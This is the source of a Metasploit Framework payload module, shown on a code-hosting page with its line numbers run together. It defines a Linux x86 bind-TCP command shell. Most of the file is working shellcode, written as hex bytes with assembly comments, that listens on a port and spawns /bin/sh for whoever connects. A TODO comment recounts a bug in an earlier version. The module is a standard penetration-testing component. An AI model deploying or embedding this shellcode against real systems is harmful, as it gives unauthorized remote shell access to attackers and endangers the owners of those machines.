Path: blob/master/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
19851 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 7878include Msf::Payload::Single9include Msf::Payload::Linux::X86::Prepends10include Msf::Sessions::CommandShellOptions1112def initialize(info = {})13super(14merge_info(15info,16'Name' => 'Linux Command Shell, Bind TCP Inline',17'Description' => 'Listen for a connection and spawn a command shell',18'Author' => 'Ramon de C Valle',19'License' => MSF_LICENSE,20'Platform' => 'linux',21'Arch' => ARCH_X86,22'Handler' => Msf::Handler::BindTcp,23'Session' => Msf::Sessions::CommandShellUnix,24'Payload' => {25'Offsets' =>26{27'LPORT' => [ 21, 'n' ]28},29# TODO: Payload source needs serious cleanup. This payload was30# originally generated from31# external/source/unixasm/lin-x86-bndsockcode.s which supposedly32# worked when it was initially committed. Nevertheless, it was33# calling bind(2) with insane parameters, which ended up erroring out34# and causing execution to fall off the end of the shellcode,35# bursting into flames. See #7216, #722436'Payload' =>37"\x31\xdb" + # xorl %ebx,%ebx #38"\xf7\xe3" + # mull %ebx #39"\x53" + # pushl %ebx #40"\x43" + # incl %ebx #41"\x53" + # pushl %ebx #42"\x6a\x02" + # pushl $0x02 #43"\x89\xe1" + # movl %esp,%ecx #44"\xb0\x66" + # movb $0x66,%al #45"\xcd\x80" + # int $0x80 #46"\x5b" + # popl %ebx #47"\x5e" + # popl %esi #48"\x52" + # pushl %edx #49"\x68\x02\x00\x04\xd2" + # pushl $0xd2040200 #50"\x6a\x10" + # pushl $0x10 #51"\x51" + # pushl %ecx #52"\x50" + # pushl %eax #53"\x89\xe1" + # movl %esp,%ecx #54"\x6a\x66" + # pushl $0x66 #55"\x58" + # popl %eax #56"\xcd\x80" + # int $0x80 #57"\x89\x41\x04" + # movl %eax,0x04(%ecx) #58"\xb3\x04" + # movb $0x04,%bl #59"\xb0\x66" + # movb $0x66,%al #60"\xcd\x80" + # int $0x80 #61"\x43" + # incl %ebx #62"\xb0\x66" + # movb $0x66,%al #63"\xcd\x80" + # int $0x80 #64"\x93" + # xchgl %eax,%ebx #65"\x59" + # popl %ecx #66"\x6a\x3f" + # pushl $0x3f #67"\x58" + # popl %eax #68"\xcd\x80" + # int $0x80 #69"\x49" + # decl %ecx #70"\x79\xf8" + # jns <bndsockcode+50> #71"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #72"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #73"\x89\xe3" + # movl %esp,%ebx #74"\x50" + # pushl %eax #75"\x53" + # pushl %ebx #76"\x89\xe1" + # movl %esp,%ecx #77"\xb0\x0b" + # movb $0x0b,%al #78"\xcd\x80" # int $0x80 #79}80)81)82end83end848586